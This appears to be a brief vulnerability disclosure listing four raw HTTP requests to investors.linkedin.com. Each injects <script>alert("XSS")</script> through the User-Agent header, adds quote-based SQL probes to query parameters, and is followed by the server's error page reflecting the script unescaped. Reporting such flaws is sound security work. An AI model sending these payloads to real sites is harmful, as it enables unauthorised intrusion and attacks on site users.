The XSS vulnerability its in User-Agent:
===============
First XSS
===============
GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2
===============
Second XSS
===============
GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2
===============
Third XSS
===============
GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/stocklookup.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2
===============
Fourth XSS
===============
GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/calculator.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2
RESPONSE in all cases:
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 04 Mar 2013 11:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Error occurred processing request
Error Diagnostic
<cfoutput> Element RESULT.TITLE is undefined in RELEASEDETAIL.
The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
Browser: <script>alert("XSS")</script>
Remote Address: 192.168.149.88
</cfoutput>